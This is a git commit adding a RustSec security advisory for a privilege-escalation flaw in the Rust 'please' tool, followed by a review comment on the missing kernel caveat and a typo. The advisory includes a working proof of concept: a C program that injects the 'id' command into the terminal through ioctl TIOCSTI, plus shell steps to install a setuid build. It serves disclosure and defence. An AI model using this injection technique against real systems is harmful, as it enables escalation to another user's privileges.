Document the privilege-escalation vulnerability in pleaser. (#1798)

* Document the privilege-escalation vulnerability in pleaser. Note that the reproducer doesn't work out of the box on a modern kernel, as the ioctl TIOCSTI is disabled by default nowadays

* reviewer feedback: Include a description on how to check if you are vulnerable, fix a typo

* Revert "reviewer feedback: Include a description on how to check if you are vulnerable, fix a typo"

This reverts commit 94a4a83bd3ea0518cd2bc8a670fac1b0405da7ad.

* Fix typo

---------

Co-authored-by: Sergey "Shnatsel" Davidoff <shnatsel@gmail.com>
Alexander Kjäll
2023-10-03 13:52:15 +00:00
committed by GitHub
parent 46754ce937
commit 59c41cbaa6


@@ -0,0 +1,49 @@
```toml
[advisory]
id = "RUSTSEC-0000-0000"
package = "pleaser"
date = "2023-04-29"
url = "https://gitlab.com/edneville/please/-/issues/13"
categories = ["privilege-escalation"]
keywords = []
cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
[versions]
patched = []
[affected]
```
# Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
please is vulnerable to privilege escalation using ioctls TIOCSTI
and TIOCLINUX on systems where they are not disabled.
Here is how to see it in action:
```
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
const char *text = "id\n";
while (*text)
ioctl(0, TIOCSTI, text++);
return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
```
Please note that:
This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
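Review bot: The advisory body never states the caveat that the commit message itself raises, namely that the reproducer only works where TIOCSTI is still enabled, so a reader following the "Here is how to see it in action" steps on a current kernel will see `id` run as nobody and may conclude they are not affected. Suggest adding one sentence after "on systems where they are not disabled." saying that recent Linux kernels (6.2 and later) ship TIOCSTI disabled by default behind the `dev.tty.legacy_tiocsti` sysctl / `CONFIG_LEGACY_TIOCSTI`, and that the issue still applies wherever that knob is on, which also restores the "how to check if you are vulnerable" content that the reverted commit removed. Two smaller points: since TIOCLINUX is Linux-only and the whole mechanism is Linux tty behaviour, `[affected]` could carry `os = ["linux"]` rather than being left empty; and the closing line reads "as well when non-root wants", which should be "as well as when non-root wants", with the "Please note that:" lead-in and the sentence joined onto one line so it renders as a single paragraph.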